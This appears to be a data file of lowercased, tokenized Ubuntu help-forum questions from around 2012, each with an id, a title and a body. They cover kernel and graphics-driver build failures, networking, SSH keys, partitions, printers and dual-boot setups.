‘hweight_long’ : include/linux/bitops.h:66:41 : warning : signed and unsigned type in conditional expression [ -wsign-compare ] in file included from /usr/src/linux-headers-3.4.0-030400-generic/arch/x86/include/asm/uaccess.h:577:0 , from include/linux/poll.h:14 , from /var/lib/dkms/nvidia-current/295.40/build/nv-linux.h:97 , from /var/lib/dkms/nvidia-current/295.40/build/nv.c:13 : /usr/src/linux-headers-3.4.0-030400-generic/arch/x86/include/asm/uaccess_64.h : in function ‘copy_from_user’ : /usr/src/linux-headers-3.4.0-030400-generic/arch/x86/include/asm/uaccess_64.h:53:6 : warning : comparison between signed and unsigned integer expressions [ -wsign-compare ] in file included from /var/lib/dkms/nvidia-current/295.40/build/nv.c:13:0 : /var/lib/dkms/nvidia-current/295.40/build/nv-linux.h : at top level : /var/lib/dkms/nvidia-current/295.40/build/nv-linux.h:114:75 : fatal error : asm/system.h : no such file or directory compilation terminated . make [ 3 ] : *** [ /var/lib/dkms/nvidia-current/295.40/build/nv.o ] error 1 make [ 2 ] : *** [ _module_/var/lib/dkms/nvidia-current/295.40/build ] error 2 nvidia : left kbuild . nvidia.ko failed to build ! make [ 1 ] : *** [ module ] error 1 make : *** [ module ] error 2
147653	how to create a new iso image from an existing iso image ?	i have an iso image and i want to create an new iso image by taking some of the components in my original iso image . i would like to know how can i do that in ubuntu . is it possible to untar the original iso and tar it again with my selected folders . thanks .
147654	how to setup local repository for ubuntu 12.04	i am new with ubuntu . i want to setup a local repository for ubuntu 12.04 , because i do n't have internet access on my laptop . i downloaded repository using wget on windows machine and its download directory structure under us.archive.ubuntu.com directory . please let me how i setup local repository using it . thanks for response ( in advance ) .
147660	can not access system after deleting passwd file -- - 2	kagan i executed from a usb driver all your instructions . i was able to locate my partition with my installed ubuntu system . i saw my files ... they were there . i renamed passwd_bkp as passwd ... and re-started the system ... . my system works ... .but my password is not accepeted ... . : ( my user name is there ... my my password is invalid ... what should i do now ?
147661	tiny scrollbars are difficult ... and dangerous !	in ubuntu 12.04 , the scrollbars on windows are super narrow . this makes trying to grab the resize boundary at the right edge of a window nearly impossible . furthermore , the little popup scrollbar is dangerous . many times i thought i clicked on it to scroll the window downward , but actually i was unintentionally dragging a file somewhere , possibly because i `` just missed '' the little popup scrollbar . is there any way to fix these problems and dangers without replacing unity ?
147663	can i dual boot win 7 64 bit with ubuntu 32 bit ?	i have a windows 7 64 bit and now i am thinking to install ubuntu 32 bit on a separate partition as dual boot.can i do that ? someone told me that i can not dual boot a 64 bit and 32 bit os as it can mess my hard drive . please tell me is it true or a myth . thanks in advance
147668	atf and eclipse ecourred `` error initializing the web browser ''	i had ubuntu 12.04 64-bit and i installed eclipse with pdt and atf.i encontered follow error when i run php project : error initializing the web browser . no more handles ( java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-xulrunner-gtk-3740 in java.library.path no swt-xulrunner-gtk in java.library.path ca n't load library : /home/mehdi/.swt/lib/linux/x86_64/libswt-xulrunner-gtk-3740.so ca n't load library : /home/mehdi/.swt/lib/linux/x86_64/libswt-xulrunner-gtk.so )
147679	adding ocr info to a pdf	i have a good quality scan of a document ; such scan is in pdf format . how can i add ocr information to the pdf , so that it becomes searchable ? by searchable i mean that the goal is that when viewing the pdf with evince , ctrl-f actually allows me to search in the pdf content .
147680	hard drive partition	i partitioned my hard drive like this : 250gb = root 750gb = logical i am already using now the 250gb , now i want to use my 750gb for a file server . i am planning to configure samba file server to my system . can someone help me what to do ? thanks in advance : )
147682	nautilus is very slow	one month ago i updated ( no fresh install ) to 12.04 . since then nautilus got extremely slow . when i open a folder that contains many subfolders i sometimes have to wait 4 seconds until everything is displayed . this has never been like that before , in previous versions i could always browse between my files extremely fast . if i start nautilus with root-rights from a terminal , it does work perfectly . i looked in `` additional drivers '' and changed from nvidia current-version-update to the recommended drivers . this drastically increased the performance and speed of file browsing , unfortunately just for a couple of days . now i am stuck again with the very slow nautilus . i also tried to install the latest nvidia driver like it was suggested here : http : //www.techlw.com/2012/03/install-nvidia-drivers-on-ubuntu-1204.html did not work at all . also when using the dash to try to find files it does not respond properly : does not find files or loads for ages until the file is displayed . i am working on an acer notebook with intel® core™ i5 cpu m 430 @ 2.27ghz × 4 6gb ram geforce gt 320m/pcie/sse2 64 bit ubuntu 12.04
147684	web development on ubuntu	i recently started learning ubuntu , and i 'll like to know if it is possible for me to practice and develop web applications with php/mysql and html/css on ubuntu , develop linux based applications/gui ? also will this be enough for me to master linux server configuration ? then is there a manual for ubuntu ? for example www.php.net as for php . i 'll be most delighted with your honest answers and opinions .
147686	how to display window titles in unity super+w mode ?	gnome 3 displays window titles in the spread , it helps if we ca n't identify the window by it 's thumbnail , such as many terminal windows open . any way to display window titles in the super+w screen ?
147687	a `` tinkered '' pc can ping by ip , not by hostname . how to fix ?	like this : root @ tis-server : ~ # ping www.google.com ping : unknown host www.google.com root @ tis-server : ~ # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=55 time=50.3 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=55 time=65.4 ms it was tinkered by somebody else and i ( and him ! ) cant trace his actions . the graphical connection manager also refuses to work thanks to the tinkering . it also makes route add default gw 192.168.0.1 necessary for each reboot to atleast ping by ip . how do i fix this ? it is ubuntu 11.10 as requested : output of ifconfig : eth0 link encap : ethernet hwaddr 48:5b:39 : ae:21:98 inet addr:192.168.0.100 bcast:0.0.0.0 mask:255.255.255.0 inet6 addr : fe80 : :4a5b:39ff : feae:2198/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13194 errors:0 dropped:0 overruns:0 frame:0 tx packets:5156 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1420596 ( 1.4 mb ) tx bytes:827295 ( 827.2 kb ) interrupt:42 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4817 errors:0 dropped:0 overruns:0 frame:0 tx packets:4817 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:377732 ( 377.7 kb ) tx bytes:377732 ( 377.7 kb ) output of resolv.conf : output of /etc/network/interfaces : gnu nano 2.2.6 file : /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.100 netmask 255.255.255.0
147688	touch screen support asus ep121	has anyone installed 12.04 on the asus ep121 , and if so , what works ? of all things , the touch screen would be the most important . has anyone had any luck with it ?
147690	unable to set default gateway on a hosted windows virtual server	i 'm running ubuntu server via hyper-v and have successfully installed it but seem unable to ping the server or ping any other machines on the network from the server . after doing a bit of reading i 've noticed that the default gateway is n't set but when i try and set it i keep getting error messages which i ca n't understand . from this article i 've tried ip route add default via 10.0.10.200 which reports : rtnetlink answers : operation not permitted if i try running it prefixed with sudo but it reports : `rnetlink answers : no such process i 've editted /etc/network/interfaces but when i start the machine and type netstat -nr there is nothing listed . can anyone tell me where i 'm going wrong please ? edit : /etc/network/interfaces contains : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp ip address : 10.0.10.82 subnet mask : 255.255.255.0
147692	sound devices refuse to work on root gui login ( 11.10 )	the gui for configuration shows an absence of any sound devices . sound works fine for other users . how do i fix this ?
147698	`` host key verification failed '' error when transfering files using scp command	when i am trying to transfer files using scp command i 'm getting this error ( removed my ip and rsa key ) : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : remote host identification has changed ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ it is possible that someone is doing something nasty ! someone could be eavesdropping on you right now ( man-in-the-middle attack ) ! it is also possible that the rsa host key has just been changed . the fingerprint for the rsa key sent by the remote host is -- -- -- -- -- -- -- -- -- -- -- -- ( rsa key ) please contact your system administrator . add correct host key in /home/users/myaccount/.ssh/known_hosts to get rid of this message . offending key in /home/users/myaccount/.ssh/known_hosts:4 rsa host key for 'my ip ' has changed and you have requested strict checking . host key verification failed . lost connection i am using newly installed ubuntu 12.04 and i can connect to this server using ssh . any help ?
147703	super key does n't work on kubuntu 12.04	i have kubuntu 12.04 installed on hp 430 notebook pc . my problem is that when i press super key , nothing happened . some of my fn keys did not work either . i have changed the keyboard model in system settings > hardware > input devices > keyboard to hewlett packard internet keyboard but does n't seems to help . i have also compiz-config-setting-manager installed but i do n't know how to make the right keyboard setting . i would like to have the super key launch start menu launcher as in ms-windows , is it possible ... thanks for the help
147706	lync ( formerly office communicator ) with pidgin-sipe = > read error	i always could connect to my companys microsoft lync network which is based on sip . there is an addon for pidgin called pidgin-sipe . everything worked fine unless the company changed something weird . now i always get a read error when i want to connect . the debug output shows the following : http : //fixee.org/paste/vmfb4sl/ is n't it possible anymore to connect or is this an error of pidgin-sipe ?
147707	problem on upgrade from 11.10 to 12.4 with cd	i write the ubuntu 12.4 .iso file to cd . reboot my pc and boot from cd and chose install ubuntu . i do n't know why the chosen `` upgrade ubuntu 11.10 to 12.04 `` is disable ? is problem in my hardware ? i read all the page for this upgrade on the internet but none of this worked for me
147709	checking hd smart status on a fresh install	on a fresh install of 12.04 what is the best/easiest way to see the smart status of the hard-drive ? previous ubuntu versions had a nice preinstalled gui to do so , but i can not seem to find it anymore .
147714	invalid ssh key error in juju when using it with maas	this is the output of juju from a clean install with 2 nodes all running 12.04 juju bootstrap - finishes with no errors and allocates the machine to the user but still no joy after juju environment-destroy and rebuild with different users and different nodes . root @ cloudcontrol : /storage # juju -v status 2012-06-07 11:19:47,602 debug initializing juju status runtime 2012-06-07 11:19:47,621 info connecting to environment ... 2012-06-07 11:19:47,905 debug connecting to environment using node-386077143930 ... 2012-06-07 11:19:47,906 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' node-386077143930 '' remote_port= '' 2181 '' local_port= '' 57004 '' . the authenticity of host 'node-386077143930 ( 10.5.5.113 ) ' ca n't be established . ecdsa key fingerprint is 31:94:89:62:69:83:24:23:5f:02:70:53:93:54 : b1 : c5 . are you sure you want to continue connecting ( yes/no ) ? yes 2012-06-07 11:19:52,102 error invalid ssh key 2012-06-07 11:19:52,426:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.5 2012-06-07 11:19:52,426:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 662 : client environment : host.name=cloudcontrol 2012-06-07 11:19:52,426:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2012-06-07 11:19:52,426:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.2.0-23-generic 2012-06-07 11:19:52,426:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 2012-06-07 11:19:52,428:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 679 : client environment : user.name=sysadmin 2012-06-07 11:19:52,428:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 687 : client environment : user.home=/root 2012-06-07 11:19:52,428:18541 ( 0x7feb13b58700 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/storage 2012-06-07 11:19:52,428:18541 ( 0x7feb13b58700 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=localhost:57004 sessiontimeout=10000 watcher=0x7feb11afc6b0 sessionid=0 sessionpasswd= < null > context=0x2dc7d20 flags=0 2012-06-07 11:19:52,429:18541 ( 0x7feb0e856700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:57004 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-06-07 11:19:55,765:18541 ( 0x7feb0e856700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:57004 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client i have tried numerous ways of creating the keys with ssh-keygen -t rsa -b 2048 , ssh-keygen -t rsa , ssh-keygen , and i have tried adding those to maas web config page , but always get the same result . i have added the appropriate public key afterwards to the ~/.ssh/authorized_keys i can also ssh to the node , but as i have not been asked to give it a user name or password or set up any sort of account , i can not manually ssh into the node . the setup of the node is all handled by maas server . it seems like a simple error of looking at the wrong key or looking in the wrong places , only other suggestions i can find are to destroy the environment and rebuild ( but that did n't work umpteen times now ) or leave it to build the instance once the node has powered up , but i have left for a few hours , and left overnight to build with no luck .
147716	unable to use hp laserjet 1010 as network printer after upgrade to 12.04	since i upgraded all three computers to ubuntu 12.04 , i am unable to use my hp laserjet-1010 as a network printer . it works fine as local printer . the network works , too ( at least i am able to ping between the computers ) . i am user in the lp and lpadmin groups . before the upgrade it all worked nicely .
147725	ubuntu 12.04 fail to upgrade to kernel 3.4	last night i intended to upgrade my kernel from 3.2 0-24 to 3.4 ... i followed the instruction on this can i install linux kernel 3.4 in ubuntu and kubuntu 12.04 ? . first i downloaded the kernel deb files on this http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.4-precise/ then run the first command on terminal sudo dpkg -i linux-headers-3.4.0-030400_3.4.0-030400.201205210521_all.deb and likely it successful , this is the output : ( reading database ... 402527 files and directories currently installed . ) preparing to replace linux-headers-3.4.0-030400 3.4.0-030400.201205210521 ( using linux-headers-3.4.0-030400_3.4.0-030400.201205210521_all.deb ) ... unpacking replacement linux-headers-3.4.0-030400 ... setting up linux-headers-3.4.0-030400 ( 3.4.0-030400.201205210521 ) ... so then i run the second command sudo dpkg -i linux-headers-3.4.0-030400-generic-pae_3.4.0-030400.201205210521_i386.deb and the output is here : ( reading database ... 402527 files and directories currently installed . ) preparing to replace linux-headers-3.4.0-030400-generic-pae 3.4.0-030400.201205210521 ( using linux-headers-3.4.0-030400-generic-pae_3.4.0-030400.201205210521_i386.deb ) ... unpacking replacement linux-headers-3.4.0-030400-generic-pae ... setting up linux-headers-3.4.0-030400-generic-pae ( 3.4.0-030400.201205210521 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.4.0-030400-generic-pae /boot/vmlinuz-3.4.0-030400-generic-pae error ( dkms apport ) : kernel package linux-headers-3.4.0-030400-generic-pae is not supported error ! bad return status for module build on kernel : 3.4.0-030400-generic-pae ( i686 ) consult /var/lib/dkms/fglrx-updates/8.960/build/make.log for more information . seeing errors on that output i stoped proceeding ... i already search on mr.google , this site , ubuntu forums and any blogs that related to this problem but i have n't found any solution ... the only clue is maybe my ati fglrx driver can not work with kernel 3.4 i still intend to upgrade kernel to 3.4 version because i feel my laptop is still heating with kernel 3.2 even after do some workaround by using laptop-mode-tools , jupiter , adding kernel boot option acpi_osi=linux , and etc. , on windows 7 os my laptop had running much cooler.. is there some one could suggest solution for my problem ? how to solve this problem correctly ? for your information , this is my laptop spesification : asus a42jk with intel® core™ i3 cpu m 350 @ 2.27ghz × 4 2gb memory ati mobility radeon hd 5145 and the installed fglrx driver version if i run fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 4500 series opengl version string : 3.3.11627 compatibility profile context also , this is the content of /var/lib/dkms/fglrx-updates/8.960/build/make.log : dkms make.log for fglrx-updates-8.960 for kernel 3.4.0-030400-generic-pae ( i686 ) kam jun 7 17:04:31 wit 2012 /usr/sbin/dkms : line 73 : cd : /var/lib/dkms/fglrx/8.960/build : no such file or directory amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.4.0-030400-generic-pae/build subdirs=/var/lib/dkms/fglrx-updates/8.960/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.4.0-030400-generic-pae' cc [ m ] /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.o /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.c : in function ‘kasinitexecutionlevels’ : /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.c:4184:5 : error : ‘cpu_possible_map’ undeclared ( first use in this function ) /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.c:4184:5 : note : each undeclared identifier is reported only once for each function it appears in /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.c:4184:5 : warning : left-hand operand of comma expression has no effect [ -wunused-value ] /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.c : in function ‘kcl_fpu_begin’ : /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.c:5839:5 : error : implicit declaration of function ‘__thread_has_fpu’ [ -werror=implicit-function-declaration ] /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.c:5840:9 : error : implicit declaration of function ‘__save_init_fpu’ [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/fglrx-updates/8.960/build/2.6.x/firegl_public.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx-updates/8.960/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.4.0-030400-generic-pae' make : *** [ kmod_build ] error 2 build failed with return value 2 thanks =d update @ john s gruber : hi john , last night i tried your suggestion , i removed the fglrx driver first and then successfully upgraded to 3.4 , but then came another problem with my ati graphic card.. before reboot i try install the free open source driver from repo using jockey gtk , first i try install the post-release update but failed , then i try the second one and it seems success and there are no error , so then i reboot.. after reboot the plymouth not appeared , and after loged in my desktop changed to unity 2d , so i check the fglrx fglrxinfo x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 138 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 13 current serial number in output stream : 13 so it seems my ati driver not installed properly , and my laptop became so hot like 70 celcius degree and keep going hotter ... then i try to install ati driver from amd website , but failed and ended up just like when i try install the 3.4 kernel , the kernel not working with binary driver . then i remove the fglrx using guide from here *http : //wiki.cchtml.com/index.php/ubuntu_oneiric_installation_guide # removing_catalyst.2ffglrx* and run these command sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.backup sudo rm -rf /etc/ati reboot and my 3d got worked again without fglrx driver just using mesa driver but my laptop keep heating up ... i searched on google and arrived on this link http : //ubuntuforums.org/showthread.php ? t=1988444 that said there is a patch that can make fglrx work on kernel 3.4 , and i try the solutions but once again the kernel still refused to install the fglrx driver even using patch from this link http : //ati.cchtml.com/attachment.cgi ? id=464 again i tried to install the driver several times with several purges and several reboots still the same , always appear this error on /var/lib/dkms/fglrx/8.961/build/make.log dkms make.log for fglrx-8.961 for kernel 3.4.0-030400-generic-pae ( i686 ) sab jun 16 07:21:16 wit 2012 amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.4.0-030400-generic-pae/build subdirs=/var/lib/dkms/fglrx/8.961/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.4.0-030400-generic-pae' cc [ m ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c : in function ‘kasinitexecutionlevels’ : /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : error : ‘cpu_possible_map’ undeclared ( first use in this function ) /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : note : each undeclared identifier is reported only once for each function it appears in /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : warning : left-hand operand of comma expression has no effect [ -wunused-value ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c : in function ‘kcl_fpu_begin’ : /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:5812:5 : error : implicit declaration of function ‘__thread_has_fpu’ [ -werror=implicit-function-declaration ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:5813:9 : error : implicit declaration of function ‘__save_init_fpu’ [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/8.961/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.4.0-030400-generic-pae' make : *** [ kmod_build ] error 2 build failed with return value 2 after that long night and got no solutions i switched back to kernel 3.2 ... is there no one can give me solution for kernel 3.4 ? ? sorry for the inconvenient on the link with * , i limited to post only 2 hyperlink.. thanks for the concern , i appreciate it..
147726	ca n't install ubuntu using wubi on a windows dynamic disk	when i try to install ubuntu 12.04 - 64 bit alongside win 7 prof. 64 bit it generated the following error . how could i proceed without having this ? i - an error occurred : error executing command command= c : \windows\sysnative\bcdedt.exe /set { 1 bo4672f-5969-11 ) -a75c-d3d3od877b8o } device partition= f : retval=1 stderr=an error has occurred setting the element data . the request is not supported . stdout for more information , please see the log file c\users\dell\appdata\local\temp\wubi-12.04
147730	rhythmbox-scope consuming lots of memory	i 've noticed that rhythmbox-scope for unity-hud 's music-lens is taking something above 18 % of my memory all the time without doing anything useful . actually using it for searching music does n't change the consumption rate in any way . it 's rock steady at 18 , xx % , thus making it the worst memory eater on my entire system . i 'm using a samsung r710 notebook with 4gb ram ( which should be enough imho ) with ubuntu 12.04 lts . any suggestions on how to lower this memory usage other than uninstalling the music-lens or rhythmbox-scope would be very much appreciated . thanks in advance for any useful answer ! btw : rhythmbox itself is quite memory hungry as well , making it choke every now and then on title change . perhaps this is somehow related ?
147732	google maps opengl 3d makes my system unstable ( hangup )	running ubuntu 12.04lts . i tried to load google maps with the opengl 3d new functionality . my system does weird things graphically and still reports system errors after reboot . what shall i do ? btw , i can not access maps any more , if i do the system crashes again .
147734	ubuntu 12.04 fails to boot after sudo apt-get upgrade	yesterday i upgraded my system with sudo apt-get upgrade . i upgrade on a regular basis so not a lot of packages were installed and i do n't know which ones this time . but after that i booted my computer and he hangs on `` checking battery state '' . i googled a bit and i could manage to start unity , how : crtl+alt+f1 to open a terminal startx ( this starts the graphical stuff ) once that was started i opened a terminal with ctrl+alt+t and then the command : unity & disown now everything works as normal . but this is annoying , and how can this be fixed . after googling a while i guess that it has something to with my video card . the info : ~ $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6400m series opengl version string : 4.2.11631 compatibility profile context my video card : radeon 6470m i also tried to download the driver from http : //www2.ati.com/drivers/linux/amd-driver-installer-12-4-x86.x86_64.run and followed these instructions https : //help.ubuntu.com/community/binarydriverhowto/ati but my system still hangs at boottime . what do i need to do to get my system boot as normal again . if you need additional info let me know . edit : somehow ubuntu ca n't work anymore with the proprietary drivers from ati for radeon hd 6400m series . i reinstalled ubuntu and everything works fine ( at first sight ) , but i want to install the proprietary drives . now the problem is that i ca n't connect a second screen to my laptop anymore ... therefore i need the proprietary driver
147737	how do i set kile as the default application for .tex files ?	using ubuntu 12.04 . i would like to choose kile as the default application for tex files , but i run into problems . i go through '' right click '' - > properties - > open with - > show other applications but kile is not in the list , so how can i choose kile ? am i missing something obvious ?
147738	how to install a program with a graphical installer in ubuntu 12.04 ?	i want to install yed ( http : //www.yworks.com/en/products_yed_about.html ) . it has a .sh installer which first unpacks and then starts a graphical installer . i have tried sudo and gksudo but so far without success . the installer terminates with : 'could not display the gui . this application needs access to an x server . '
147739	how do you get rid of efi bios ?	well i 'm trying to install ubuntu on an old 2003 made computer , the only problem is that it keeps on crashing into a kernel panic . it reverts to the text based installer , and if i takeaway the startup.sh file it does n't boot at all . that gives me the suspicion that it has efi bios software , which ubuntu probably is n't compatible with . is there a way to install ubuntu on old efi bios , or maybe just a way to update the bios ?
147741	x11 directory specified in makefile does n't exist , but project compiles and runs perfectly	so the x11 directory defined in the makefile is : usr/x11r6/lib64 , which does not exist . however , the project compiles perfectly in kdevelop and runs with no problems . if i take out all inclusions of x11 in the makefile , it does n't compile . ( 1 ) does the compiler search for x11 libs somehow if the dir specified does not exist ? ( 2 ) how can i find where exactly x11 libs are in my computer ? for ( 2 ) , i 've found /usr/lib/x11 , but i ca n't find any library files in there ... ( i am attempting to rewrite the makefile in cmake format in kubuntu , if that matters at all . ) thanks !
147747	unable to boot os x after installing ubuntu 12.04	i installed ubuntu 12.04 on my mb ( aluminium late 2008 ) . after installing ubuntu i am unable to boot into os x. sequence of events : install refit on os x install ubuntu on a partitioned drive . i also installed grub . now when i boot my mb only the grub menu shows up . when i select os x under grub i see a black screen for a while and the machine restarts ( when selecting os x 64 bit ) or it hangs indefinitely ( os x 32 bit ) . could you please help ? link to output of boot info script . http : //paste.ubuntu.com/1028017/
147750	upgrade ubuntu 11.10 to 12.04lts	hello ! after installing and checking few times for packages that are not in ubuntu 11.10 . i decides to upgrade to version 12.04lts . but i can`t find an `` upgrade '' button . and of course the sentence 'new ubuntu release 12.04lts is available ' . what is a wrong here ? how can i upgrade ?
147751	restoring win7 to factory image : good idea ?	hello guys i have a dell laptop with two operating systems , ubuntu and windows 7 , currently i spend all my time in ubuntu , so i decided to resotre windows 7 to factory image , will it harm my ubuntu ?
147754	mysql in python broken in virtualenv after move to 12.04	this morning i upgraded my xubuntu to 12.04 . the virtualenv has moved up a version , and now bundles pip and i 've had to rearrange some scripts to cope with this and rebuild my virtualenvs . mysql dbapi is now giving me strange errors . it can only create innodb tables ; if you try an create myisam tables ( from python code ) , it raises : notsupportederror : ( 1286 , `` unknown storage engine 'myiasm ' '' ) when i run the mysql command-line program itself , its happy to create both innodb and myisam tables . what is configured wrongly and how do i fix this ?
147762	how to resize /dev/root partition ?	i have just installed ubuntu desktop on a dedicated remote server but the disk seems to be full even though the server has a 1tb disk ? : desktop @ xxxx : / $ sudo df -h filesystem size used avail use % mounted on rootfs 9.8g 9.3g 4.0k 100 % / /dev/root 9.8g 9.3g 4.0k 100 % / /dev 994m 8.0k 994m 1 % /dev none 199m 2.7m 197m 2 % /run none 5.0m 0 5.0m 0 % /run/lock none 995m 12k 995m 1 % /run/shm /dev/sda2 921g 14g 862g 2 % /home i do n't know what data i sould move to the /home folder or how to modify partitions to have some space ? ? the server is extremely slow and i can hardly connect to it through ssh : - ( any help would be greatly appreciated .
147763	setup wan miniport ( pppoe ) internet connection	hello i 'm from ahmedabad , india . i want to setup my gtpl ( i.e . the service provider ) pppoe internet connection in ubuntu 12.04 . please help ... .. i had tried to configure my internet connection in fedora 16 using the following method which worked fine : -- i 've tried to go to edit connection > then to the dsl tab > then add > enter my username and password > save . but this method did n't help in ubuntu 12.04. please help me out immediately ... ... . thank you in advance .
147764	buggenie plugin installation issue	i am trying to install / configure buggenie plugin on wordpress ( ubuntu 10.04 ) . i get errors in pcre 8.0 version . did a lot of google search but none resolved the issue , i just got deeper into a worse mess . sudo apt-get install libpcre3 libpcre3-dev i then downloaded libpcre 8.0 version , make failed with make all-am make [ 1 ] : entering directory `/home/ < homedir > /downloads/pcre-8.30' cxx pcrecpp.lo libtool : compile : unrecognized option `-dhave_config_h' libtool : compile : try `libtool -- help ' for more information . make [ 1 ] : *** [ pcrecpp.lo ] error 1 make [ 1 ] : leaving directory `/home/ < homedir > /downloads/pcre-8.30' make : *** [ all ] error 2 did a bit more research and found that i need to install g++ and build-essential sudo apt-get install g++ sudo apt-get install build-essential yet i get the same error on `` make '' .
147766	problem while enter my password to open an editor	i 've installed ssh but i have a problem when i try to write my password.i get this message : sudo ] password for hduser : sorry , try again . [ sudo ] password for hduser : debug3 : received ssh2_msg_ignore debug3 : received ssh2_msg_ignore debug3 : received ssh2_msg_ignore debug3 : received ssh2_msg_ignore debug3 : received ssh2_msg_ignore debug3 : received ssh2_msg_ignore
147768	how to have vncviewer connections open in maximized window ?	i use sshplus to handle vnc connection , using a command line argument such as : vncviewer host : port -fullcolour -passwd /home/.vnc/passwd everything works , but i 'd like to have its window automatically open maximized . moreover , it should be great if the connected machine 's screen could fit this window , but i suppose this is a vncviewer related issue .
147772	hud keeps popping up when watching movie in movie player	when i watch a movie in movie player , the hud pops up every 8 minutes or so . i am not touching the keyboard or the mouse at all . alt makes the bar go away , and then 7-8 minutes later , it pops up again . this happens when i 'm watching fullscreen or not fullscreen . can you help me fix this ? i 've been using vlc instead ( because it does not have this problem ) , but i do n't like it as much as movie player .
147775	installation of wifi epson sx235w , 4in1 printer / scanner , on ubuntu 12.04 , 64 bit ?	i got an epson stylus sx235w wifi printer/scanner and ran into some installation problems : i got the printer working on an usb cable . trying to go wireless , i need the printers ip address , but the status sheet tells a lot but for the ip address : `` none '' . also the scanner i could not install . what do i need and how do i manage , in simple english ( step by step ) or dutch ?
147777	ubuntu in macbook pro	i just got myself a macbook pro with a quad core processor . apart from osx lion i would like to have ubuntu on it as dual boot . i wondered if you could recommend me which linux version i could choose , or either 32 or 64 bits ? on the other hand , does anybody know if it 's possible to pair the music/videos/downloads folder from both os ? thanks a lot for your help . alemanio
